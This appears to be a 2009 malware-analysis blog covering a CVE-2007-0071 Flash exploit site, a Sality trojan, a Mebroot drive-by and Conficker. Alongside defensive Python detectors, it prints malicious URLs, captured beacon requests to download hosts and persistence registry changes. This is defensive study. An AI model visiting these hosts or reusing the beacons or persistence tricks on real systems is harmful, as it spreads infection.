May 14, 2009

Malicious Site containing SWF: CVE-2007-0071

Malicious Site: http://jjxp22.cn/a/iqq.html
Someone submitted this malicious link "http://jjxp22.cn/a/iqq.html" to me. It seems to be a pop-up or hidden link from some compromised sites.

After checking the page source, I found an obfuscated JavaScript (shown below).

Obfuscated JavaScript

I de-obfuscated the JavaScript and found that it uses Deconcept's SWFObject to embed malicious Shockwave Flash files that exploit the integer overflow vulnerability in Adobe Flash Player 9.0.115.0 and earlier (CVE-2007-0071), which allows remote attackers to execute arbitrary code.

The malicious Flash files (6 of them, shown in the script below) exploit the Flash Player and download malicious executables onto the victim's system from various websites.

De-obfuscated JavaScript

Sample Flash file info
###############

Filename: i16.swf
Size: 17897
MD5: 426969FD0D7324EE170D6F46BDB203B6
Virus Found: Bloodhound.Exploit.193 (Symantec)
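The bug behind CVE-2007-0071 sits in the DefineSceneAndFrameLabelData tag (tag code 86): a SceneCount that is negative as a signed 32-bit integer passes the player's signed bounds check and ends up as the offset of a write. The script below is an added example, not code from the original post and not the exploit or SWFObject code: it walks the tag list of an SWF (plain FWS or zlib-compressed CWS) and flags a tag 86 whose scene count is negative as int32, larger than the bytes after it could describe, or simply implausible. It builds its own benign and hostile sample files inline, so it does not need i16.swf. The 1024-scene ceiling and the two-bytes-per-scene minimum are the example's own assumptions.

```python
"""Flag the malformed DefineSceneAndFrameLabelData tag that CVE-2007-0071
exploits rely on (added example, not code from the original post)."""
import struct
import zlib

DEFINE_SCENE_AND_FRAME_LABEL_DATA = 86   # tag code from the SWF specification
MAX_PLAUSIBLE_SCENES = 1024              # assumption: no real movie has more


def read_encoded_u32(buf, pos):
    """Decode an SWF EncodedU32: 7 bits per byte, low bits first, at most 5 bytes."""
    value, shift = 0, 0
    for _ in range(5):
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            break
        shift += 7
    return value & 0xFFFFFFFF, pos


def swf_tags(data):
    """Yield (code, body) for every tag of an FWS (plain) or CWS (zlib) file."""
    signature = data[:3]
    if signature == b"FWS":
        body = data[8:]
    elif signature == b"CWS":
        body = zlib.decompress(data[8:])    # everything after the 8-byte header
    else:
        raise ValueError("not an SWF file")
    # Frame-size RECT: 5-bit Nbits then four Nbits-wide fields, padded to a byte.
    nbits = body[0] >> 3
    pos = (5 + 4 * nbits + 7) // 8
    pos += 4                                # FrameRate (u16) and FrameCount (u16)
    while pos + 2 <= len(body):
        header = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = header >> 6, header & 0x3F
        if length == 0x3F:                  # long form: u32 length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                       # End tag
            break


def scan_swf(data, max_scenes=MAX_PLAUSIBLE_SCENES):
    """Return findings for SceneCount values a sane tag 86 could never carry.

    CVE-2007-0071 uses a count that is negative as a signed 32-bit integer, so
    it passes the player's signed bounds check; we also flag counts larger than
    the tag can describe (each scene needs at least a 1-byte offset and a
    1-byte empty name) or than any real movie would use.
    """
    findings = []
    for code, body in swf_tags(data):
        if code != DEFINE_SCENE_AND_FRAME_LABEL_DATA or not body:
            continue
        scene_count, pos = read_encoded_u32(body, 0)
        reasons = []
        if scene_count >= 0x80000000:
            reasons.append("negative as signed int32")
        if scene_count > max_scenes:
            reasons.append("exceeds plausible scene count")
        if scene_count > (len(body) - pos) // 2:
            reasons.append("more scenes than the tag has bytes for")
        if reasons:
            findings.append({"scene_count": scene_count,
                             "tag_length": len(body), "reasons": reasons})
    return findings


# --- constructed sample files (not the i16.swf from the post) ---------------
def encode_u32(value):
    out = bytearray()
    while True:
        byte, value = value & 0x7F, value >> 7
        if not value:
            out.append(byte)
            return bytes(out)
        out.append(byte | 0x80)


def make_tag(code, body):
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body


def build_swf(scene_count, scenes=b"", compress=False):
    """One-frame SWF whose tag 86 carries the given SceneCount and scene records."""
    scene_tag = encode_u32(scene_count) + scenes + encode_u32(0)   # FrameLabelCount = 0
    body = b"\x00" + struct.pack("<HH", 0x1800, 1)                 # empty RECT, 24 fps, 1 frame
    body += make_tag(DEFINE_SCENE_AND_FRAME_LABEL_DATA, scene_tag)
    body += make_tag(1, b"") + make_tag(0, b"")                     # ShowFrame, End
    header = struct.pack("<I", 8 + len(body))                       # uncompressed length
    if compress:
        return b"CWS\x09" + header + zlib.compress(body)
    return b"FWS\x09" + header + body


BENIGN_SWF = build_swf(1, encode_u32(0) + b"Scene 1\x00")
HOSTILE_SWF = build_swf(0xFFFFFFFF, compress=True)   # -1 as int32: the CVE pattern

if __name__ == "__main__":
    print("benign :", scan_swf(BENIGN_SWF))
    print("hostile:", scan_swf(HOSTILE_SWF))
```

Run it on a real sample with `scan_swf(open("i16.swf", "rb").read())`; a CWS file is decompressed before the tag walk, so packing does not hide the tag. The check is deliberately about malformed counts, not about the exact allocation arithmetic, which varies between player builds.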

On the VirusTotal website, 13 of 39 AV engines detected it (shown below).

VirusTotal

From the whois record, the IP address (61.164.108.35) belongs to RuiAn Telecom (China).

Who-is record

May 5, 2009

Malware analysis: Trojan W32/Sality

I received a suspicious file from my colleague this morning and did a simple behaviour analysis on it.

Analysis Report:
##############

Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky, F-Secure)

On the VirusTotal website, 36 of 40 AV engines detected it (details).



Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

Entries 1 and 2 are the same change seen twice (CurrentControlSet is a link to the active ControlSet00N). They add the sample to the Windows Firewall's authorized-applications list under the display name "ipsec", a name chosen to look legitimate in the Exceptions tab, so the host firewall will accept unsolicited inbound connections to it. XP's firewall does not filter outbound traffic, so the exception only matters for anything the sample listens on.

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

Entries 3 and 4 decode (UTF-16LE) to "sec1.xml" and "sec1.xml.lnk", a RecentDocs record for a file named sec1.xml; whether the sample or the analyst's tooling opened it is not established by this run.

5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01

Entry 5 is an XP UserAssist counter; the value name is ROT13-encoded and reads UEME_RUNPATH:C:\Documents and Settings\Owner\Desktop\~.exe, so Explorer recorded the sample being launched from the desktop.

6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."

7> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"

Entries 6 and 7 are MUICache strings Explorer caches for items it has displayed (entry 6 is the My Computer description, entry 7 the sample's own name); they show the sample was started through the shell and are not a persistence mechanism.

Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010

2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011

3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"

4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""

The diff lists each modified value twice, old then new. Entries 3 and 4 are the persistence mechanism: the Winlogon Shell value should contain only "Explorer.exe"; with the sample's path appended, the sample is started at every interactive logon, and restoring the value to "Explorer.exe" is part of cleanup.

5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039

6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A

7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039

8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A

Entries 1-2 and 5-8 are side effects rather than deliberate changes: the Prefetcher counter advances as new processes are launched, and the firewall service bumps SharedAccess\Epoch whenever its policy changes, here because of the exception added above.

Files modified:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat

2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat

3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat

4> C:\WINDOWS\system.ini

5> C:\WINDOWS\system32\config\software.LOG

6> C:\WINDOWS\system32\config\system.LOG

Other behaviours:
=============
System connecting to:
1> peskostruikaz.com:80
The following HTTP request was found:
GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache

2> johnsonbodyshop.com:80
No request after the initial handshake.

3> shopatforgetmenot.com:80
The following HTTP request was found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache

4> corporateshelters.com:80
No request after the initial handshake.

It seems the malware is trying to download further payloads from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif". Both requests carry the same id=2554099245826 parameter, which looks like a per-victim identifier, and both use the same User-Agent string together with a Cache-Control: no-cache header; that combination is a usable network signature, and the id value is worth searching for in other captures.
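The report above is a raw registry diff plus two captured requests, and the indicators that matter (the Winlogon Shell change, the firewall exception, the shared bot id) have to be picked out by hand. The script below is an added example, not from the original post and not the sample's own code, that does the picking automatically over the report's own lines, embedded as constructed input: it flags a Winlogon Shell value that is anything other than Explorer.exe, flags firewall exceptions whose program lives under a user-writable path or whose display name does not match the executable, and groups the beacon requests by their id parameter. The user-writable path list and the "display name should match the executable" rule are assumptions of the example, not something the page states.

```python
"""Pull the persistence and beacon indicators out of the report above
(added example, not from the original post and not the sample's own code)."""
from urllib.parse import parse_qs, urlsplit

# Constructed input: registry-diff lines copied from the report above, in the
# "key\value: data" form the diff tool prints.
REGISTRY_LINES = [
    r'HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy'
    r'\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner'
    r'\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"',
    r'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: '
    r'"Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""',
    r'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011',
    r'HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A',
]

# Assumption: directories where a dropped binary would sit; a legitimate
# firewall exception normally points at Program Files or the system directory.
USER_WRITABLE = ("c:\\documents and settings\\", "\\temp\\")


def split_line(line):
    """Split 'key\\value: data' at the first ': ' and strip the outer quotes."""
    key, data = line.split(": ", 1)
    if len(data) >= 2 and data[0] == data[-1] == '"':
        data = data[1:-1]
    return key, data


def triage_registry(lines):
    """Return (kind, detail) findings for Winlogon Shell and firewall tampering."""
    findings = []
    for line in lines:
        key, data = split_line(line)
        k = key.lower()
        if k.endswith("\\winlogon\\shell"):
            # Winlogon starts whatever is listed here at every logon.
            if data.strip().lower() != "explorer.exe":
                findings.append(("winlogon_shell", data))
        elif "\\firewallpolicy\\" in k and "\\authorizedapplications\\list\\" in k:
            # Value format: <path>:<scope>:<Enabled|Disabled>:<display name>
            path, _scope, state, name = data.rsplit(":", 3)
            exe = path.rsplit("\\", 1)[-1].lower()
            odd_path = any(marker in path.lower() for marker in USER_WRITABLE)
            odd_name = name.lower() not in exe          # "ipsec" for "~.exe"
            if state.lower() == "enabled" and (odd_path or odd_name):
                findings.append(("firewall_exception", f"{path} shown as '{name}'"))
    return findings


# Constructed input: the two HTTP requests captured in the report above.
HTTP_REQUESTS = [
    "GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57\r\n"
    "Host: peskostruikaz.com\r\nCache-Control: no-cache\r\n\r\n",
    "GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57\r\n"
    "Host: shopatforgetmenot.com\r\nCache-Control: no-cache\r\n\r\n",
]


def parse_request(raw):
    """Return (host, path, query dict, user-agent) from a raw HTTP/1.1 request."""
    head, *hdrs = raw.split("\r\n")
    _method, target, _version = head.split(" ", 2)
    headers = dict(h.split(": ", 1) for h in hdrs if ": " in h)
    parts = urlsplit(target)
    return headers.get("Host"), parts.path, parse_qs(parts.query), headers.get("User-Agent")


def beacon_ids(requests):
    """Map each Host to its 'id' query value so a shared bot id stands out."""
    return {host: query.get("id", [None])[0]
            for host, _path, query, _ua in map(parse_request, requests)}


if __name__ == "__main__":
    for kind, detail in triage_registry(REGISTRY_LINES):
        print(f"{kind}: {detail}")
    print(beacon_ids(HTTP_REQUESTS))
```

The Prefetcher and Epoch lines pass through without a finding, which is the point: the script separates the two deliberate changes from the noise a diff tool always records.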

Apr 28, 2009

Malicious Website: u-toys.com

U-toys.com

This website "www.u-toys.com" was forwarded to me by commandrine as a suspicious website. When accessing the website, there seems to be a JavaScript running. Checking the page source (HTML code), there is an obfuscated JavaScript (shown below). It seems to have been created by some JavaScript obfuscator application that I was not able to de-obfuscate.

Obfuscated Javascript

After doing some behaviour analysis on the JavaScript, it seems to be exploiting some Internet browser vulnerabilities. It manages to inject an executable file into the C:\ folder on older, unpatched browsers. Newly patched browsers do not seem to get any "injected" files. Below is the analysis of the executable file.

Analysis Report:
##############

Filename: b01kyk.exe
Size: 327680
MD5: 615A8484F113DA99D2C172A44C9E7D31
Virus found: Trojan:W32/Mebroot.gen!A (F-Secure)

On the VirusTotal website, 11 of 38 AV engines detected it (shown below); some well-known engines (Symantec, McAfee) did not.

VirusTotal

Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

2> HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\o01xlx.rkr: 0B 00 00 00 06 00 00 00 00 78 6B 45 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\b01kyk.exe: "b01kyk"

Registry values modified:
==================
1> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000B

2> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000C

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 7F 00 00 00 70 D2 53 1A 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 80 00 00 00 20 91 5F 45 46 D4 C9 01

5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D3 00 00 00 20 5B 70 1A 46 D4 C9 01

6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D4 00 00 00 00 78 6B 45 46 D4 C9 01

As in the Sality report, each modified value appears twice (old, then new). ServiceCurrent is a counter the Service Control Manager advances each time it starts a service process, so a service was started during the run; which one is not captured in this diff. The UserAssist names are ROT13: HRZR_HVFPHG is UEME_UISCUT (a launch by shortcut or double-click) and HRZR_EHACNGU is UEME_RUNPATH (a program run by path); their counters advancing simply record the sample being executed.
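Two of the values above carry the real story but are printed as hex. PendingFileRenameOperations (entries 1 and 2 of "Registry values added") is a REG_MULTI_SZ of source/destination pairs that smss.exe carries out at the next boot; an empty destination means "delete", which is how a dropper removes itself and its temp files after the reboot a bootkit install needs. The UserAssist value (entry 3) has a ROT13 name and, on XP, a 16-byte body of session id, run counter and FILETIME of the last run. The script below is an added example, not code from the original post, that decodes both from the bytes printed above (copied in as constructed input). It assumes the one-byte-per-character layout the diff tool printed (a live hive stores UTF-16LE) and that XP's counter starts at 5, so a stored 6 means one run.

```python
"""Decode the PendingFileRenameOperations list and the XP UserAssist counter
from the report above (added example, not code from the original post)."""
import codecs
import struct
from datetime import datetime, timedelta

# Constructed input: the bytes of "Registry values added" entry 1, copied as
# the diff tool printed them (one byte per character, NUL-separated).
PENDING_HEX = """
5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73
5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00
5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31
5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00
5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73
5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00
5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31
5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00
5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31
5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00
5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31
5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00
5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00
"""

# Constructed input: entry 3 of "Registry values added", name and 16-byte data.
USERASSIST_NAME = r"HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\o01xlx.rkr"
USERASSIST_HEX = "0B 00 00 00 06 00 00 00 00 78 6B 45 46 D4 C9 01"
XP_COUNT_BASE = 5                 # assumption: XP starts the run counter at 5
FILETIME_EPOCH = datetime(1601, 1, 1)


def decode_multi_sz(data):
    """Split a NUL-separated MULTI_SZ blob into its strings, empty ones included."""
    if data.endswith(b"\x00"):
        data = data[:-1]          # drop the list terminator
    parts = data.split(b"\x00")
    if parts and parts[-1] == b"":
        parts.pop()               # artefact of the last string's own NUL
    return [p.decode("latin-1") for p in parts]


def pending_renames(data):
    """Pair the strings as (source, destination); destination None = delete at boot."""
    strings = decode_multi_sz(data)
    if len(strings) % 2:
        strings.append("")
    return [(src, dst or None) for src, dst in zip(strings[::2], strings[1::2])]


def decode_userassist(name, data):
    """ROT13 the value name and unpack session id, run count and last-run FILETIME."""
    session, count, filetime = struct.unpack("<IIQ", data)
    last_run = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return {"name": codecs.decode(name, "rot13"), "session": session,
            "runs": count - XP_COUNT_BASE, "last_run": last_run}


if __name__ == "__main__":
    for src, dst in pending_renames(bytes.fromhex(PENDING_HEX)):
        print("delete at boot:" if dst is None else f"rename to {dst}:", src)
    print(decode_userassist(USERASSIST_NAME, bytes.fromhex(USERASSIST_HEX)))
```

Every one of the seven entries has an empty destination, so the sample scheduled itself (twice) and its D.tmp, E.tmp and F.tmp droppings for deletion at the next boot; the files will already be gone by the time an examiner looks at the rebooted machine, which is why the registry value itself is the artifact to capture.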

w01f advises: always keep your Internet browser patched, and beware of suspicious scripts and pop-ups running on websites.

Other reports on this site:
- Security Republic - Innocent???

Mar 27, 2009

Welcome

This site is created to provide a platform for anyone to share their ideas, experiences and findings on malware analysis. Feel free to comment or e-mail me any suspicious files.

Mar 22, 2009

Info on Conficker

Found some excellent write-ups on the Conficker worm by researchers at SRI International. It is one of the best analyses of the malware so far. You can find the reports at the links below.

- An Analysis of Conficker
- Addendum on Conficker C

There is more malware information at the SRI Malware Threat Center.